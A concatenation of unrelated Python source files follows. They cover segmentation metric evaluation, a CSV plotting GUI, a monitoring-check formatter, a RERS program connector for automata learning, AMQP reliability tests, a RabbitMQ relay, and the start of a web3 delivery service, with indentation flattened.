p.start()
p_list.append(p)
for p in p_list:
p.join()
IoU = []
T_TP = []
P_TP = []
FP_ALL = []
FN_ALL = []
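# Per-class metrics from the accumulated pixel counts
# (T = ground-truth pixels, P = predicted pixels, TP = correctly predicted pixels):
#   IoU    = TP / (T + P - TP)
#   FP_ALL = (P - TP) / (T + P - TP)
#   FN_ALL = (T - TP) / (T + P - TP)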
for i in range(num_cls):
IoU.append(TP[i].value/(T[i].value+P[i].value-TP[i].value+1e-10))
T_TP.append(T[i].value/(TP[i].value+1e-10))
P_TP.append(P[i].value/(TP[i].value+1e-10))
FP_ALL.append((P[i].value-TP[i].value)/(T[i].value + P[i].value - TP[i].value + 1e-10))
FN_ALL.append((T[i].value-TP[i].value)/(T[i].value + P[i].value - TP[i].value + 1e-10))
loglist = {}
for i in range(num_cls):
loglist[categories[i]] = IoU[i] * 100
miou = np.mean(np.array(IoU))
loglist['mIoU'] = miou * 100
if printlog:
for i in range(num_cls):
if i%2 != 1:
print('%11s:%7.3f%%'%(categories[i],IoU[i]*100),end='\t')
else:
print('%11s:%7.3f%%'%(categories[i],IoU[i]*100))
print('\n======================================================')
print('%11s:%7.3f%%'%('mIoU',miou*100))
return loglist
def writedict(file, dictionary):
s = ''
for key in dictionary.keys():
sub = '%s:%s '%(key, dictionary[key])
s += sub
s += '\n'
file.write(s)
def writelog(filepath, metric, comment):
filepath = filepath
logfile = open(filepath,'a')
import time
logfile.write(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
logfile.write('\t%s\n'%comment)
writedict(logfile, metric)
logfile.write('=====================================\n')
logfile.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--list", default='./VOC2012/ImageSets/Segmentation/train.txt', type=str)
parser.add_argument("--predict_dir", default='./out_rw', type=str)
parser.add_argument("--gt_dir", default='./VOC2012/SegmentationClass', type=str)
parser.add_argument('--logfile', default='./evallog.txt',type=str)
parser.add_argument('--comment', required=True, type=str)
parser.add_argument('--type', default='png', choices=['npy', 'png'], type=str)
parser.add_argument('--t', default=None, type=float)
parser.add_argument('--curve', default=False, type=bool)
args = parser.parse_args()
if args.type == 'npy':
assert args.t is not None or args.curve
df = pd.read_csv(args.list, names=['filename'])
name_list = df['filename'].values
if not args.curve:
loglist = do_python_eval(args.predict_dir, args.gt_dir, name_list, 21, args.type, args.t, printlog=True)
writelog(args.logfile, loglist, args.comment)
else:
l = []
for i in range(60):
t = i/100.0
loglist = do_python_eval(args.predict_dir, args.gt_dir, name_list, 21, args.type, t)
l.append(loglist['mIoU'])
print('%d/60 background score: %.3f\tmIoU: %.3f%%'%(i, t, loglist['mIoU']))
writelog(args.logfile, {'mIoU':l}, args.comment)
|
entrypoint.py
|
import json
from csv import DictReader
from datetime import datetime
from multiprocessing import Pipe, cpu_count
from pathlib import Path
from threading import Thread
from typing import Dict, Iterator, List, Optional, Tuple
import yaml # type: ignore
from click import Choice
from click.utils import echo
from pydantic import ValidationError
from pyqtgraph import (
DateAxisItem,
FillBetweenItem,
GraphicsLayoutWidget,
PlotCurveItem,
PlotItem,
mkQApp,
setConfigOptions,
)
from pyqtgraph.graphicsItems.PlotCurveItem import PlotCurveItem
from PySide6.QtGui import QIcon
from typer import Argument, Exit, Option, Typer, colors, get_app_dir, prompt, secho
from .background_processor import BackgroundProcessor
from .csv import pad_and_sample, pseudo_hash
from .csv.selector import Selected
from .interfaces import COLOR_NAME_TO_HEXA, Configuration
setConfigOptions(background="#141830", foreground="#D1D4DC", antialias=True)
ICON_PATH = Path(__file__).parent / "assets" / "icon-256.png"
app = Typer()
APP_DIR = Path(get_app_dir("csv-plot"))
FILES_DIR = APP_DIR / "files"
FILES_DIR.mkdir(parents=True, exist_ok=True)
CONFIG_PATH = APP_DIR / "config.json"
def default_configuration_directory_callback(
default_configuration_directory: Optional[Path],
):
if default_configuration_directory:
with CONFIG_PATH.open("w") as file_descriptor:
json.dump(
{
"default_configuration_directory": str(
default_configuration_directory
)
},
file_descriptor,
)
echo()
secho(
"😃 Default configuration directory set to: ",
fg=colors.BRIGHT_GREEN,
nl=False,
bold=True,
)
secho(
f"{default_configuration_directory} 😃",
fg=colors.BRIGHT_GREEN,
)
echo()
default_configuration_directory.mkdir(parents=True, exist_ok=True)
raise Exit()
def get_configuration_files(configuration_files_dirs: List[Path]) -> List[Path]:
base_files = [item for item in configuration_files_dirs if item.is_file()]
directories = [item for item in configuration_files_dirs if item.is_dir()]
extra_files = [
extra_file
for directory in directories
for extra_file in directory.iterdir()
if extra_file.suffix == ".yaml"
]
return base_files + extra_files
def get_default_configuration_files() -> Iterator[Path]:
if not CONFIG_PATH.exists():
echo()
secho("❌ ERROR: ", fg=colors.BRIGHT_RED, bold=True, nl=False)
secho(
"No configuration file provided and "
"no default configuration directory defined ❌",
fg=colors.BRIGHT_RED,
)
secho(
"You can either use a configuration file or directory with `-c` or "
"`--configuration-file-or-directory` option, or define default "
"configuration directory with:",
bold=True,
)
secho(
"$ csv-plot --set-default-configuration-directory",
bold=True,
fg=colors.CYAN,
)
echo()
raise Exit()
with CONFIG_PATH.open("r") as file_descriptor:
configuration = json.load(file_descriptor)
return (
path
for path in Path(configuration["default_configuration_directory"]).iterdir()
if path.suffix == ".yaml"
)
@app.command()
def main(
csv_path: Path = Argument(
...,
help="CSV file to plot. This file must contain a header.",
exists=True,
file_okay=True,
dir_okay=False,
resolve_path=True,
),
configuration_files_dirs: Optional[List[Path]] = Option(
None,
"-c",
"--configuration-files-or-directories",
help=(
"A list of configuration files or directories containing configuration "
"files. You can specify only one configuration file, or one directory, or "
"mix of files and directories... If a directory is specified, CSV Plot "
"explores recursively all subdirectories to find configuration files. If "
"several configuration files match the CSV file, then CSV Plot ask you "
"which one you want to use."
),
exists=True,
file_okay=True,
dir_okay=True,
resolve_path=True,
show_default=False,
),
set_default_configuration_directory: Optional[Path] = Option(
None,
help=(
"Set a default directory where CSV Plot will recursively look for "
"configuration files. Once done, no need to specify configuration file any "
"more. If a configuration file is specified at launch while a default "
"directory is specified, then the configuration file will supersede the "
"default directory."
),
file_okay=False,
dir_okay=True,
resolve_path=True,
is_eager=True,
callback=default_configuration_directory_callback,
),
):
"""🌊 CSV Plot - Plot CSV files without headaches! 🏄
CSV Plot is a tool to efficiently plot your CSV files.
You define a YAML configuration file which specifies how your CSV file should be
plotted (layout, colors, legend, units, etc.) and CSV Plot handles the heavy work
for you.
CSV Plot respects your computer's memory: it only loads into memory the portion
of the file that has to be plotted. CSV Plot can plot files that are bigger than
your memory and has been tested with files larger than 100 GB.
"""
# Get CSV file columns names corresponding to floats
def is_castable_to_float(value: str) -> bool:
try:
float(value)
return True
except ValueError:
return False
with csv_path.open() as csv_file:
reader = DictReader(csv_file)
first_row = next(reader)
columns = {name for name, value in first_row.items() if is_castable_to_float(value)}
# Get configurations files
configuration_files = (
get_configuration_files(configuration_files_dirs)
if configuration_files_dirs
else get_default_configuration_files()
)
# Get configurations which could correspond to the CSV file
configuration_file_to_configuration_dict_maybe_none = {
configuration_file: yaml.load(
configuration_file.open("r"), Loader=yaml.FullLoader
)
for configuration_file in configuration_files
}
# If a YAML file is empty, then it will be parsed as `None`. It has to be filtered
configuration_file_to_dict = {
configuration_file: configuration_dict
for configuration_file, configuration_dict in configuration_file_to_configuration_dict_maybe_none.items()
if configuration_dict is not None
}
try:
configuration_file_to_configuration = {
configuration_file: Configuration(**configuration_dict)
for configuration_file, configuration_dict in configuration_file_to_dict.items()
}
except ValidationError as e:
secho("ERROR:", fg=colors.BRIGHT_RED, bold=True)
secho(str(e), fg=colors.BRIGHT_RED)
raise Exit()
matching_file_to_configuration = {
configuration_file: configuration
for configuration_file, configuration in configuration_file_to_configuration.items()
if configuration.variables <= columns
}
if len(matching_file_to_configuration) == 0:
secho(
"❌ ERROR: ",
fg=colors.BRIGHT_RED,
bold=True,
nl=False,
)
secho(
"No configuration file matching with CSV columns found ❌",
fg=colors.BRIGHT_RED,
)
raise Exit()
elif len(matching_file_to_configuration) == 1:
chosen_configuration, *_ = matching_file_to_configuration.values()
else:
matching_files_configurations = list(matching_file_to_configuration.items())
matching_files, configurations = zip(*matching_files_configurations)
secho(
"Multiple configuration files correspond:",
fg=colors.BRIGHT_GREEN,
bold=True,
)
for index, matching_file in enumerate(matching_files):
secho(
f"{index} - {matching_file}",
fg=colors.BRIGHT_YELLOW,
)
choice = prompt(
"Choose which one you want to use",
type=Choice([str(item) for item in range(len(matching_files))]),
show_choices=False,
)
chosen_configuration = configurations[int(choice)]
x = chosen_configuration.general.variable
secho("Process CSV file... ", fg=colors.BRIGHT_GREEN, bold=True, nl=False)
pad_and_sample(csv_path, FILES_DIR, x, cpu_count())
secho("OK", fg=colors.BRIGHT_GREEN, bold=True)
win = GraphicsLayoutWidget(show=True, title="🌊 CSV PLOT 🏄")
win.showMaximized()
first_plot: Optional[PlotItem] = None
variable_to_low_high: Dict[str, Tuple[PlotCurveItem, PlotCurveItem]] = {}
def get_plot(layout_item: Configuration.LayoutItem) -> PlotItem:
plot: PlotItem = win.addPlot(
row=layout_item.x - 1,
col=layout_item.y - 1,
title=layout_item.title,
axisItems=(
{"bottom": DateAxisItem()}
if chosen_configuration.general.as_datetime
else {}
),
)
plot.showGrid(x=True, y=True)
plot.setLabel(
"bottom",
text=chosen_configuration.general.label,
units=chosen_configuration.general.unit,
)
plot.setLabel(
"left",
text=layout_item.label,
units=layout_item.unit,
)
return plot
position_to_plot: Dict[Tuple[int, int], PlotItem] = (
{
(layout_item.x, layout_item.y): get_plot(layout_item)
for layout_item in chosen_configuration.layout
}
if chosen_configuration.layout is not None
else {}
)
for curve in chosen_configuration.curves:
color = COLOR_NAME_TO_HEXA[curve.color]
low = PlotCurveItem(pen=color)
high = PlotCurveItem(pen=color)
fill = FillBetweenItem(low, high, color)
if (curve.x, curve.y) not in position_to_plot:
position_to_plot[(curve.x, curve.y)] = get_plot(
Configuration.LayoutItem(position=f"{curve.x}-{curve.y}")
)
plot = position_to_plot[(curve.x, curve.y)]
plot.addItem(low)
plot.addItem(high)
plot.addItem(fill)
variable_to_low_high[curve.variable] = low, high
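# Link every plot to the first one on the X axis so panning or zooming any
# panel moves all panels together.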
first_plot, *plots = position_to_plot.values()
for plot in plots:
plot.setXLink(first_plot)
date_time_formats = chosen_configuration.general.date_time_formats
def date_time_parser(x: str, date_time_formats: List[str]) -> datetime:
for date_time_format in date_time_formats:
try:
return datetime.strptime(x, date_time_format)
except ValueError:
pass
raise ValueError(
f"time data '{x}' does not match any format in " "{date_time_formats}"
)
parser = (
(lambda x: date_time_parser(x, date_time_formats))
if date_time_formats is not None
else float
)
connector, background_connector = Pipe()
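# Pipe protocol, as used below: the GUI side sends (x_min, x_max, plot_width_px)
# tuples whenever the visible X range changes; the update thread receives
# (xs, {variable: Selected.Y}) tuples holding the min/max envelopes to draw.
# A `None` item is the shutdown sentinel: it is sent in the `finally` block and
# the update thread returns when it receives one.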
background_processor = BackgroundProcessor(
FILES_DIR / pseudo_hash(csv_path, x),
(x, parser), # type: ignore
list(chosen_configuration.variables),
background_connector,
)
def on_sig_x_range_changed():
x_range, _ = first_plot.viewRange()
x_min, x_max = x_range
connector.send((x_min, x_max, int(first_plot.width())))
def update():
while True:
item: Optional[Tuple[List[float], Dict[str, Selected.Y]]] = connector.recv()
if item is None:
return
xs, variable_to_y = item
for variable, y in variable_to_y.items():
low, high = variable_to_low_high[variable]
low.setData(xs, y.mins)
high.setData(xs, y.maxs)
update_thread = Thread(target=update)
update_thread.start()
try:
first_plot.sigXRangeChanged.connect(on_sig_x_range_changed)
background_processor.start()
connector.send((None, None, int(first_plot.width())))
app = mkQApp()
app.setWindowIcon(QIcon(str(ICON_PATH)))
app.exec()
finally:
connector.send(None)
background_processor.join()
|
maas_telegraf_format.py
|
#!/usr/bin/env python
# Copyright 2017, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import os
import re
import yaml
BASE_PATH = '/etc/rackspace-monitoring-agent.conf.d'
RUN_VENV = '/usr/lib/rackspace-monitoring-agent/plugins/run_plugin_in_venv.sh'
CFG_FILE = '/etc/maas_telegraf_format.yml'
RETURN_QUEUE = multiprocessing.Queue()
class Runner(object):
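"""Small worker pool for formatting MaaS check commands.

Argument lists put on the JoinableQueue are picked up by worker processes,
prefixed with the venv runner script and `--telegraf-output`, and the
resulting command strings are pushed onto RETURN_QUEUE for printing later.
"""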
def __init__(self):
self.queue = multiprocessing.JoinableQueue()
self.processes = [
multiprocessing.Process(target=self.run_details)
for _ in range(2)
]
for p in self.processes:
p.start()
def put(self, item):
self.queue.put(item)
def run_details(self):
while True:
detail_args = self.queue.get()
if not detail_args:
break
detail_args.insert(0, RUN_VENV)
detail_args.insert(2, '--telegraf-output')
RETURN_QUEUE.put(' '.join(detail_args).strip())
self.queue.task_done()
def terminate(self):
self.queue.join()
for p in self.processes:
p.terminate()
def str2bool(boolean):
if boolean.lower() in ("yes", "true", "1"):
return True
elif boolean.lower() in ("no", "false", "0"):
return False
else:
raise ValueError('Not a Boolean')
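# e.g. str2bool("Yes") -> True, str2bool("0") -> False; any other value raises.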
def load_yaml(check_file):
with open(check_file) as f:
return yaml.safe_load(f.read())
def main():
pattern = load_yaml(CFG_FILE)['include_pattern']
r = Runner()
try:
for _, _, items in os.walk(BASE_PATH):
for item in items:
# We take an "allow everything except" approach here.
# By default, allow everything: .*
# Don't want to allow file names that begin with
# "rally"? Try this: ^(?!rally).*
match = re.match(pattern=pattern, string=item)
if match is None:
continue
check_load = load_yaml(os.path.join(BASE_PATH, item))
if not str2bool(boolean=check_load.get('disabled')):
details = check_load.get('details')
if isinstance(details, dict) and 'args' in details:
r.put(item=details['args'])
finally:
r.terminate()
q_items = list()
while True:
try:
q_item = RETURN_QUEUE.get(timeout=1)
except Exception:
break
else:
q_items.append(q_item)
# Print a sorted list of commands
print('\n'.join(sorted(q_items)))
if __name__ == '__main__':
main()
|
rersconnector.py
|
from suls.sul import SUL
import pexpect
from subprocess import check_output
import re
from abc import ABC, abstractmethod
from typing import Tuple
import threading
import time
# Restarting a process with pexpect takes a long time,
# so we create a pool-ish thing that starts processes
# in the background, so they're ready to go when
# we need them.
class PexpectPool:
def __init__(self, path, n):
self.path = path
self.n = n
self.cur_idx = 0
self.processes = [None]*n
self.available = [False]*n
self._lock = threading.Lock()
threads = []
for i in range(n):
print('starting', i)
threads.append(threading.Thread(target=self._start, args=(i,)))
threads[i].start()
print('started', i)
for thread in threads:
print("started", thread)
thread.join()
def get(self):
with self._lock:
# Find the nearest slot that is ready to go
while True not in self.available:
time.sleep(0.01)
idx = self.available.index(True)
self.available[idx] = False
print('[CHECKOUT]', idx)
# Create a new process in the background soon
threading.Timer(0.5, self._start, args=[idx]).start()
return self.processes[idx]
def _start(self, index):
self.processes[index] = pexpect.spawn(self.path, encoding='utf-8')
self.available[index] = True
def reset(self, process):
threading.Thread(target=process.terminate).start()
# This class serves as an adaptor to the RERS 2019 problems
# It uses pexpect to interact with the compiled c programs
# It also provides early stopping functionality for queries known
# to be prefixed by invalid input or hitting a verifier error
class RERSConnector(SUL, ABC):
def __init__(self, path_to_binary):
self.path = path_to_binary
self.pool = PexpectPool(self.path, 10)
self.p = self.pool.get()
self.needs_reset = True
self.cache = {}
@abstractmethod
def _interact(self, inputs):
pass
@abstractmethod
def _checkinvalidprefixes(self, inputs) -> Tuple[bool, object]:
pass
def process_input(self, inputs):
inputs = tuple(inputs)
print("[Query]", inputs)
# Check if the input is already in cache
if inputs in self.cache.keys():
self.needs_reset = False
print("[Cache hit]")
return self.cache[inputs]
# Check prefixes
hit, result = self._checkinvalidprefixes(inputs)
if hit:
return result
# If no cache hit, actually send the input to the SUT
return self._interact(inputs)
def reset(self):
if self.needs_reset:
print("[Reset]")
self.pool.reset(self.p)
self.p = self.pool.get()
def get_alphabet(self):
# Grep the source file for the line defining the input alphabet
tmp = check_output(["grep", "-o", "int inputs\[\] \= {\(.*\)};", f"{self.path}.c"])
# Extract it and put it into a list
return re.search('{(.*)}', tmp.decode()).group(1).split(',')
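# e.g. a line like `int inputs[] = {1,2,3,4,5};` in the C source yields
# the alphabet ['1', '2', '3', '4', '5'].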
# Connects and interacts with the RERS programs, returning booleans for DFA learning
# True is returned on a verifier error (so these turn into an accepting state)
# False is returned otherwise
class BooleanRERSConnector(RERSConnector):
def __init__(self, path_to_binary):
super().__init__(path_to_binary)
self.invalid_prefixes = set()
self.error_hit_prefixes = set()
def _checkinvalidprefixes(self, inputs):
for i in range(len(inputs)):
curprefix = inputs[0:i+1]
# Check if a prefix of the current input sequence has already been invalidated
if curprefix in self.invalid_prefixes:
print("[Skipped - Invalid prefix]")
self.needs_reset = False
#self.cache[inputs] = False
return True, False
# Check if a prefix of the current input already hit a verifier error
if curprefix in self.error_hit_prefixes:
print("[Skipped - Verifier error found]")
self.needs_reset = False
#self.cache[inputs] = True
return True, True
# Or, if no cache hit:
return False, None
# Performs the interaction with the RERS SUT
def _interact(self, inputs):
for input in inputs:
self.needs_reset = True
print("[Send]", input)
self.p.sendline(input)
index = self.p.expect([
'[0-9]+\r\n([0-9]+)\r\n',
'Invalid input:.*$'
])
# We have an accepted input or a verifier error
if index == 0:
# Keep track of the matched regex in case we need to still print it
prev_match = self.p.match
# Check if we have hit a verifier error
idx_2 = self.p.expect(['error_[0-9]+', pexpect.TIMEOUT], timeout=0.05)
if idx_2 == 0:
print("[OK]", prev_match.group(1))
print("[Verifier ERROR]", self.p.match.group(0))
self.error_hit_prefixes.add(inputs)
self.cache[inputs] = True
return True
else:
print("[OK]", prev_match.group(1))
# We have an invalid input
elif index == 1:
print("[ERROR]", self.p.match.group(0))
self.invalid_prefixes.add(inputs)
self.cache[inputs] = False
return False
# Or we got through the entire input string without hitting a verifier error / invalid input
self.cache[inputs] = False
return False
# Interacts with the compiled RERS programs,
# But returns strings instead of booleans for mealy machine learning.
class StringRERSConnector(RERSConnector):
def __init__(self, path_to_binary):
super().__init__(path_to_binary)
self.invalid_prefixes = {}
self.error_hit_prefixes = {}
def _checkinvalidprefixes(self, inputs):
for i in range(len(inputs)):
curprefix = inputs[0:i+1]
# Check if a prefix of the current input sequence has already been invalidated
if curprefix in self.invalid_prefixes.keys():
print("[Skipped - Invalid prefix]")
result = self.invalid_prefixes[curprefix]
self.needs_reset = False
#self.cache[inputs] = result
return True, result
# Check if a prefix of the current input already hit a verifier error
if curprefix in self.error_hit_prefixes.keys():
print("[Skipped - Verifier error found]")
result = self.error_hit_prefixes[curprefix]
self.needs_reset = False
#self.cache[inputs] = result
return True, result
# Or, if no cache hit:
return False, None
def _interact(self, inputs):
# Keep track of what the last response from the SUT was
result = None
for input in inputs:
self.needs_reset = True
print("[Send]", input)
self.p.sendline(input)
index = self.p.expect([
'[0-9]+\r\n([0-9]+)\r\n',
'Invalid input:.*$'
])
# We have an accepted input or a verifier error
if index == 0:
# Keep track of the matched regex in case we need to still print it
prev_match = self.p.match
# Check if we have hit a verifier error
idx_2 = self.p.expect(['error_[0-9]+', pexpect.TIMEOUT], timeout=0.05)
if idx_2 == 0:
result = self.p.match.group(0)
print("[OK]", prev_match.group(1))
print("[Verifier ERROR]", result)
self.error_hit_prefixes[inputs] = result
self.cache[inputs] = result
return result
else:
result = prev_match.group(1)
print("[OK]", result)
# We have an invalid input
elif index == 1:
result = "invalid_input"
print("[ERROR]", self.p.match.group(0))
self.invalid_prefixes[inputs] = result
self.cache[inputs] = result
return result
# Or we got through the entire input string without hitting a verifier error / invalid input
self.cache[inputs] = result
return result
if __name__ == "__main__":
r = BooleanRERSConnector('../rers/TrainingSeqReachRers2019/Problem11/Problem11')
alphabet = r.get_alphabet()
from numpy.random import choice
input = list(choice(alphabet, 200))
input = ["9", "10"]
print("Sending", input)
result = r.process_input(input)
print("Result:", result)
print("DONE")
|
reliability_tests.py
|
import imp
import sys
import threading
import time
from amqpstorm import AMQPConnectionError
from amqpstorm import AMQPMessageError
from amqpstorm import Connection
from amqpstorm import UriConnection
from amqpstorm import compatibility
from amqpstorm.tests import HOST
from amqpstorm.tests import PASSWORD
from amqpstorm.tests import URI
from amqpstorm.tests import USERNAME
from amqpstorm.tests.utility import TestFunctionalFramework
from amqpstorm.tests.utility import setup
class ReliabilityFunctionalTests(TestFunctionalFramework):
@setup(new_connection=False, queue=True)
def test_functional_open_new_connection_loop(self):
for _ in range(25):
self.connection = Connection(HOST, USERNAME, PASSWORD)
self.channel = self.connection.channel()
# Make sure that it's a new channel.
self.assertEqual(int(self.channel), 1)
self.channel.queue.declare(self.queue_name)
# Verify that the Connection/Channel has been opened properly.
self.assertIsNotNone(self.connection._io.socket)
self.assertIsNotNone(self.connection._io.poller)
self.assertTrue(self.connection.is_open)
self.channel.close()
self.connection.close()
# Verify that the Connection has been closed properly.
self.assertTrue(self.connection.is_closed)
self.assertIsNone(self.connection._io.socket)
self.assertIsNone(self.connection._io.poller)
self.assertFalse(self.connection._io._running.is_set())
self.assertFalse(self.connection.exceptions)
@setup(new_connection=False, queue=True)
def test_functional_open_close_connection_loop(self):
self.connection = Connection(HOST, USERNAME, PASSWORD, lazy=True)
for _ in range(25):
self.connection.open()
channel = self.connection.channel()
# Make sure that it's a new channel.
self.assertEqual(int(channel), 1)
channel.queue.declare(self.queue_name)
channel.close()
# Verify that the Connection/Channel has been opened properly.
self.assertIsNotNone(self.connection._io.socket)
self.assertIsNotNone(self.connection._io.poller)
self.assertTrue(self.connection.is_open)
self.connection.close()
# Verify that the Connection has been closed properly.
self.assertTrue(self.connection.is_closed)
self.assertIsNone(self.connection._io.socket)
self.assertIsNone(self.connection._io.poller)
self.assertFalse(self.connection._io._running.is_set())
self.assertFalse(self.connection.exceptions)
@setup(new_connection=True, new_channel=False, queue=True)
def test_functional_close_gracefully_after_publish_mandatory_fails(self):
for index in range(3):
channel = self.connection.channel()
# Try to publish 25 bad messages.
for _ in range(25):
try:
channel.basic.publish('', self.queue_name, '', None, True,
False)
except AMQPMessageError:
pass
# Sleep for 0.1s to make sure RabbitMQ has time to catch up.
time.sleep(0.1)
self.assertTrue(channel.exceptions)
channel.close()
@setup(new_connection=False, queue=True)
def test_functional_open_close_channel_loop(self):
self.connection = Connection(HOST, USERNAME, PASSWORD)
for _ in range(25):
channel = self.connection.channel()
# Verify that the Channel has been opened properly.
self.assertTrue(self.connection.is_open)
self.assertTrue(channel.is_open)
# Channel id should be staying at 1.
self.assertEqual(int(channel), 1)
channel.close()
# Verify that the Channel has been closed properly.
self.assertTrue(self.connection.is_open)
self.assertTrue(channel.is_closed)
@setup(new_connection=False, queue=True)
def test_functional_open_multiple_channels(self):
self.connection = Connection(HOST, USERNAME, PASSWORD, lazy=True)
for _ in range(5):
channels = []
self.connection.open()
for index in range(10):
channel = self.connection.channel()
channels.append(channel)
# Verify that the Channel has been opened properly.
self.assertTrue(channel.is_open)
self.assertEqual(int(channel), len(channels))
self.connection.close()
@setup(new_connection=False, queue=False)
def test_functional_close_performance(self):
"""Make sure closing a connection never takes longer than ~1 seconds.
:return:
"""
for _ in range(10):
self.connection = Connection(HOST, USERNAME, PASSWORD)
start_time = time.time()
self.connection.close()
self.assertLess(time.time() - start_time, 3)
@setup(new_connection=False, queue=False)
def test_functional_close_after_channel_close_forced_by_server(self):
"""Make sure the channel is closed instantly when the remote server
closes it.
:return:
"""
for _ in range(10):
self.connection = Connection(HOST, USERNAME, PASSWORD)
self.channel = self.connection.channel(rpc_timeout=360)
start_time = time.time()
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name,
exchange='invalid')
self.channel.close()
self.assertLess(time.time() - start_time, 3)
start_time = time.time()
self.connection.close()
self.assertLess(time.time() - start_time, 3)
@setup(new_connection=False)
def test_functional_uri_connection(self):
self.connection = UriConnection(URI)
self.channel = self.connection.channel()
self.assertTrue(self.connection.is_open)
def test_functional_ssl_connection_without_ssl(self):
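# Simulate a Python build without ssl support by masking sys.modules['ssl']
# and reloading the compatibility module, then restore both afterwards.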
restore_func = sys.modules['ssl']
try:
sys.modules['ssl'] = None
imp.reload(compatibility)
self.assertIsNone(compatibility.ssl)
self.assertRaisesRegexp(
AMQPConnectionError,
'Python not compiled with support for TLSv1 or higher',
Connection, HOST, USERNAME, PASSWORD, ssl=True
)
finally:
sys.modules['ssl'] = restore_func
imp.reload(compatibility)
class PublishAndConsume1kTest(TestFunctionalFramework):
messages_to_send = 1000
messages_consumed = 0
lock = threading.Lock()
def configure(self):
self.disable_logging_validation()
def publish_messages(self):
for _ in range(self.messages_to_send):
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name)
def consume_messages(self):
channel = self.connection.channel()
channel.basic.consume(queue=self.queue_name,
no_ack=False)
for message in channel.build_inbound_messages(
break_on_empty=False):
self.increment_message_count()
message.ack()
if self.messages_consumed == self.messages_to_send:
break
def increment_message_count(self):
with self.lock:
self.messages_consumed += 1
@setup(queue=True)
def test_functional_publish_and_consume_1k_messages(self):
self.channel.queue.declare(self.queue_name)
publish_thread = threading.Thread(target=self.publish_messages, )
publish_thread.daemon = True
publish_thread.start()
for _ in range(4):
consumer_thread = threading.Thread(target=self.consume_messages, )
consumer_thread.daemon = True
consumer_thread.start()
start_time = time.time()
while self.messages_consumed != self.messages_to_send:
if time.time() - start_time >= 60:
break
time.sleep(0.1)
for channel in list(self.connection.channels.values()):
channel.stop_consuming()
channel.close()
self.assertEqual(self.messages_consumed, self.messages_to_send,
'test took too long')
class Consume1kUntilEmpty(TestFunctionalFramework):
messages_to_send = 1000
def configure(self):
self.disable_logging_validation()
def publish_messages(self):
for _ in range(self.messages_to_send):
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name)
@setup(queue=True)
def test_functional_publish_and_consume_until_empty(self):
self.channel.queue.declare(self.queue_name)
self.channel.confirm_deliveries()
self.publish_messages()
channel = self.connection.channel()
channel.basic.consume(queue=self.queue_name,
no_ack=False)
message_count = 0
for message in channel.build_inbound_messages(break_on_empty=True):
message_count += 1
message.ack()
result = channel.queue.declare(self.queue_name, passive=True)
self.assertEqual(result['message_count'], 0)
self.assertEqual(message_count, self.messages_to_send,
'not all messages consumed')
channel.close()
|
server.py
|
import pika
import sys
import threading
def Send(msg):
# print("msg")
# print(msg)
connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='logs',
exchange_type='fanout')
message = msg
if msg != '':
channel.basic_publish(exchange='logs',
routing_key='',
body=message)
print("Sent %r" % message)
connection.close()
def Receive():
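# Consume messages from the 'hello' queue and re-broadcast each message body
# on the 'logs' fanout exchange via Send().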
connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='logs',
exchange_type='fanout')
result = channel.queue_declare(exclusive=True)
queue_name = result.method.queue
channel.queue_bind(exchange='logs',
queue=queue_name)
print('Waiting for messages')
channel.queue_declare(queue='hello')
# def callback(ch, method, properties, body):
# print(" [x] %r" % body)
def callbackhello(ch, method, properties, body):
Send(body)
# print(" [c] %r" % body)
# channel.basic_consume(callback,
# queue=queue_name,
# no_ack=True)
channel.basic_consume(callbackhello,
queue='hello',
no_ack=True)
channel.start_consuming()
# send_thread = threading.Thread(target=Send(""))
receive_thread = threading.Thread(target=Receive)
# send_thread.start()
receive_thread.start()
# send_thread.join()
receive_thread.join()
|
delivery_service.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
from web3.auto.infura import w3
import socketserver
import json
import cgi
import random
import sched, time
class ScrapingHTTPServer(HTTPServer):
SCRAPE_INTERVAL = 10 # scrape USPS once every 10 seconds
ERC20_ABI = json.loads('[{"constant":true,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_spender","type":"address"},{"name":"_value","type":"uint256"}],"name":"approve","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_from","type":"address"},{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transferFrom","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"_owner","type":"address"}],"name":"balanceOf","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"_owner","type":"address"},{"name":"_spender","type":"address"}],"name":"allowance","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"anonymous":false,"inputs":[{"indexed":true,"name":"_from","type":"address"},{"indexed":true,"name":"_to","type":"address"},{"indexed":false,"name":"_value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"_owner","type":"address"},{"indexed":true,"name":"_spender","type":"address"},{"indexed":false,"name":"_value","type":"